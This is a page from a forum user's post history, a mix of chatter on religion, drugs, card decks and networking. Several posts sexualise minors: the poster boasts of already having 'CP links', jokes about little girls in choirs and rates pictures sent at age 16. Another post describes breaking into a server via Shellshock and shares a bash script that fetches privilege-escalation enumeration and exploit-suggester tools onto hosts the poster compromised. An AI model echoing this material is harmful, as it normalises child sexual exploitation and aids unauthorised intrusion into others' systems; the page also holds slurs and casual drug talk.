User Controls

  1. 1
  2. 2
  3. 3
  4. ...
  5. 1229
  6. 1230
  7. 1231
  8. 1232
  9. 1233
  10. 1234
  11. ...
  12. 1426
  13. 1427
  14. 1428
  15. 1429

Posts by Sophie

  1. Sophie Pedophile Tech Support
    Couldn't you install the browser bundle to a flash drive at home and run it from there? Alternatively you could make a live boot flash drive with TAILS if they allow you to change the boot order from within the BIOS.
  2. Sophie Pedophile Tech Support
    Holy shit Space cat trump is Mr.Happy!? How've been bruh, where the hell were you and what happened to: This is the best time to pound youknwo.
  3. Sophie Pedophile Tech Support
    Just use a VPN. You only get captchas if you're on tor.
  4. Sophie Pedophile Tech Support
    Sophie come to TC.

    Also don't become a priest that's gay as fuck.

    Don't feel like hanging out with the entire TC crew.
  5. Sophie Pedophile Tech Support
    Don't forget you can be a peedo

    Yeah, there's little girls in the choirs too right? Because i'm not into alter boys. I should become a priest and then a bishop and then a cardinal and get the title Prince of the Church and people have to call me Your Eminence. And i didn't even pull all that out of a hat, Cardinals are Princes of the Church and the proper way to adress them is Your Eminence.
  6. Sophie Pedophile Tech Support
    sorry fam I think you need to go elsewhere for cp links

    I already have enough CP links, but there's actually some pretty dank non-porn related content on the derpweb. Here's an onion link index for instance http://bdpuqvsqmphctrcs.onion/noscript_by_last_seen.html
  7. Sophie Pedophile Tech Support
    broken again,
  8. Sophie Pedophile Tech Support
    Man i wish i could do that. Hey lock, now that you're here i'd love to see some tech threads penned by you, i don't know if you know this but you're actually the one that got me interested in infosec way back on Zoklet. With regards to threads i know you don't like to write really long threads but if you'd be willing to create some awesome content i'd humbly request it to be on the topics of offensive security, or sec related coding, IDK all the languages you know but i know you're pretty advanced at bash. I've been looking into bash recently as well. I was playing around with shellshock and got an OS shell on this particular server, so then i wanted to root it like a proper hacker should. I found there were a number of enumeration shellscripts and exploit suggesters out there to run on the compromised machine to get a sense of what you're dealing with. I got a python script that searches for shellshock vulnerable hosts so having to manually 'wget' and unzip all the enumeration and exploit suggestion scripts by hand on each as you working the hosts would be a drag. So made a shellscript to automate the process.


    #!/bin/bash

    function usage()
    { printf "%b \a\n\nRoothelper will aid in the process of privilege escalation on a Linux system you compromised by fetching a number of enumeration
    and exploit suggestion scripts. Below is a quick overview of the available options.

    The 'Help' option displays this informational message.

    The 'Download' option fetches the relevant files and places them in the /tmp/ directory.

    The option 'Download and unzip' downloads all files and extracts the contents of zip archives to their individual subdirectories respectively, please
    note; if the 'mkdir' command is unavailable however, the operation will not succeed and the 'Download' option should be used instead

    The 'Clean up' option removes all downloaded files and 'Quit' exits roothelper.\n "
    }

    # Download and unzip
    function dzip()
    { echo "Downloading and extracting scripts..."
    `wget -O /tmp/ExploitSuggest.py http://www.securitysift.com/download/linuxprivchecker.py`
    `wget -O /tmp/LinEnum.zip https://github.com/rebootuser/LinEnum/archive/master.zip`
    `wget -O /tmp/ExploitSuggest_perl.zip https://github.com/PenturaLabs/Linux_Exploit_Suggester/archive/master.zip`
    `wget -O /tmp/unixprivesc.zip https://github.com/pentestmonkey/unix-privesc-check/archive/1_x.zip`
    for zip in *.zip
    do
    dirname=`echo $zip | sed 's/\.zip$//'`
    if mkdir $dirname
    then
    if cd $dirname
    then
    unzip ../$zip
    cd ..
    rm -f $zip
    else
    echo "Could not unpack $zip - cd failed"
    fi
    else
    echo "Could not unpack $zip - mkdir failed"
    fi
    done
    }

    dir="/tmp/"

    usage

    printf "%b" "\a\n\nTo use roothelper please select an option below.:\n"

    PS3='Please enter your choice: '
    options=("Help" "Download" "Download and unzip" "Clean up" "Quit")
    select opt in "${options[@]}"
    do
    case $opt in
    "Help")
    usage
    printf "%b \n"
    ;;
    "Download")
    echo "Downloading scripts to /tmp/"
    `wget -O /tmp/ExploitSuggest.py http://www.securitysift.com/download/linuxprivchecker.py`
    `wget -O /tmp/LinEnum.zip https://github.com/rebootuser/LinEnum/archive/master.zip`
    `wget -O /tmp/ExploitSuggest_perl.zip https://github.com/PenturaLabs/Linux_Exploit_Suggester/archive/master.zip`
    `wget -O /tmp/unixprivesc.zip https://github.com/pentestmonkey/unix-privesc-check/archive/1_x.zip`
    printf "%b \n"
    ;;
    "Download and unzip")
    dzip
    printf "%b \n"
    ;;
    "Clean up")
    echo "Removing downloaded files"
    find $dir/* -exec rm {} \;
    printf "%b \n"
    ;;
    "Quit")
    break
    ;;
    *) echo invalid option;;
    esac
    done


    I want your honest opinion on this, personally i thought it was pretty useful for us plebs that can't mind meld with the computer. I'd love to know more bash and it's application in a security setting. Furthermore i'm really interested in malware and not the HunterExploit Kit skidware but homecooked malware of the dankest kind, including rootkits. If you'd be willing to make a thread to grant some insight on these topics i'd be very grateful. Also, an introduction to reverse engineering and exploit development with Immunity Debugger(If you use it) would be greatly appreciated.

    Also Iam asked me to ask you if you'd be interested in setting up a specific kind of hidden service. Thanks man <3
  9. Sophie Pedophile Tech Support
    That's not what being catholic is.

    Not to preach here, but being a christian is an active commitment. I know lots of people identify as Catholics that are pretty bad people, but that doesn't make them Catholic. You live a life that pretty clearly shows you don't have that active commitment.

    Look at it this way, at what point should I not be considered a Raider's fan? I don't watch any games, don't go to any games, don't know most of the players,and don't even know a whole lot about the sport anymore. I could call myself Raider's fan, but there's a point where it's disingenuous on my part.

    Very true, my gf was raised catholic, and still claims to be catholic, yet when it comes to the rituals, the the teachings of Christ and the bible i know more about it all than her.
  10. Sophie Pedophile Tech Support
    Not a catholic but i love catholicism, the churches, the music, the vatican, the art it inspired it's power and it's history.
  11. Sophie Pedophile Tech Support
    Wait this is zok?

    Also answer the fucking question Lanny.


    On that note, KreepyKay is actually very pretty.

    "Very" is overstating it you charmer you. 7/10 at most, she sent me pics of when she was 16 as well this one time on redfern, 8.8/10, so all things considered i think it averages out to about 7.9/10.
  12. Sophie Pedophile Tech Support
    I'm going to be making my own deck soon enough. ^__^

    Kewl, lotsa work though 72 cards. How will you be making the graphics?
  13. Sophie Pedophile Tech Support
    Try waking up every morning with fentanyl withdrawels. See how that compares.
  14. Sophie Pedophile Tech Support
    ….Really?

    ya rly

  15. Sophie Pedophile Tech Support
    That doesn't fit my picture of you at all. I like it. I would've thought that you were a rebel, probably started drinking early by the age of 11 or 12, big into vandalism and then you started breakdancing in which you excelled but didn't have the motivation and positive feedback by your family to follow your talents. That broke you. You kept drinking and degraded. You're still wearing the hat, though. Nobody did the headspin like you did and every once in awhile you put some Fatboy Slim in your tapedeck and get into that 2 step.

    One two one two Huh!

    Feels...
  16. Sophie Pedophile Tech Support
    These are the other protocols I can use…


    enum
    {
    IPPROTO_IP = 0, /* Dummy protocol for TCP. */
    #define IPPROTO_IP IPPROTO_IP
    IPPROTO_ICMP = 1, /* Internet Control Message Protocol. */
    #define IPPROTO_ICMP IPPROTO_ICMP
    IPPROTO_IGMP = 2, /* Internet Group Management Protocol. */
    #define IPPROTO_IGMP IPPROTO_IGMP
    IPPROTO_IPIP = 4, /* IPIP tunnels (older KA9Q tunnels use 94). */
    #define IPPROTO_IPIP IPPROTO_IPIP
    IPPROTO_TCP = 6, /* Transmission Control Protocol. */
    #define IPPROTO_TCP IPPROTO_TCP
    IPPROTO_EGP = 8, /* Exterior Gateway Protocol. */
    #define IPPROTO_EGP IPPROTO_EGP
    IPPROTO_PUP = 12, /* PUP protocol. */
    #define IPPROTO_PUP IPPROTO_PUP
    IPPROTO_UDP = 17, /* User Datagram Protocol. */
    #define IPPROTO_UDP IPPROTO_UDP
    IPPROTO_IDP = 22, /* XNS IDP protocol. */
    #define IPPROTO_IDP IPPROTO_IDP
    IPPROTO_TP = 29, /* SO Transport Protocol Class 4. */
    #define IPPROTO_TP IPPROTO_TP
    IPPROTO_DCCP = 33, /* Datagram Congestion Control Protocol. */
    #define IPPROTO_DCCP IPPROTO_DCCP
    IPPROTO_IPV6 = 41, /* IPv6 header. */
    #define IPPROTO_IPV6 IPPROTO_IPV6
    IPPROTO_RSVP = 46, /* Reservation Protocol. */
    #define IPPROTO_RSVP IPPROTO_RSVP
    IPPROTO_GRE = 47, /* General Routing Encapsulation. */
    #define IPPROTO_GRE IPPROTO_GRE
    IPPROTO_ESP = 50, /* encapsulating security payload. */
    #define IPPROTO_ESP IPPROTO_ESP
    IPPROTO_AH = 51, /* authentication header. */
    #define IPPROTO_AH IPPROTO_AH
    IPPROTO_MTP = 92, /* Multicast Transport Protocol. */
    #define IPPROTO_MTP IPPROTO_MTP
    IPPROTO_BEETPH = 94, /* IP option pseudo header for BEET. */
    #define IPPROTO_BEETPH IPPROTO_BEETPH
    IPPROTO_ENCAP = 98, /* Encapsulation Header. */
    #define IPPROTO_ENCAP IPPROTO_ENCAP
    IPPROTO_PIM = 103, /* Protocol Independent Multicast. */
    #define IPPROTO_PIM IPPROTO_PIM
    IPPROTO_COMP = 108, /* Compression Header Protocol. */
    #define IPPROTO_COMP IPPROTO_COMP
    IPPROTO_SCTP = 132, /* Stream Control Transmission Protocol. */
    #define IPPROTO_SCTP IPPROTO_SCTP
    IPPROTO_UDPLITE = 136, /* UDP-Lite protocol. */
    #define IPPROTO_UDPLITE IPPROTO_UDPLITE
    IPPROTO_RAW = 255, /* Raw IP packets. */
    #define IPPROTO_RAW IPPROTO_RAW
    IPPROTO_MAX
    };




    I don't know much about Python, but this looks like it's just a raw socket connection, which I already am doing in Java.

    No idea about all the different protocols tbh. Also about the python code, it makes a connection on the specified IP and port then sends data over UDP and the packet data is represented by the 'data' var.
  17. Sophie Pedophile Tech Support
    I know Cisco routers can do this using syslog, not sure about others as I've never looked into it

    Same for Juniper IIRC.
  18. Sophie Pedophile Tech Support
    You're alive?

    Yeah sorry i went on a speed binge for three days. So i wasn't online.
  19. Sophie Pedophile Tech Support
    inb4lock

    You're pretty obvious lol.
  20. Sophie Pedophile Tech Support
    Same, so let's write rap lyrics or something like real ass OG space niggas.

    Blow a hole in your head, just to keep you open minded
    Sophie's lyrical wisdom is defined as truth undivided
    It sticks with you, like a loan on the contract when you signed it.
    Worth more than the gold when they mine it and refine it.

    That's all i got for now.
  1. 1
  2. 2
  3. 3
  4. ...
  5. 1229
  6. 1230
  7. 1231
  8. 1232
  9. 1233
  10. 1234
  11. ...
  12. 1426
  13. 1427
  14. 1428
  15. 1429
Jump to Top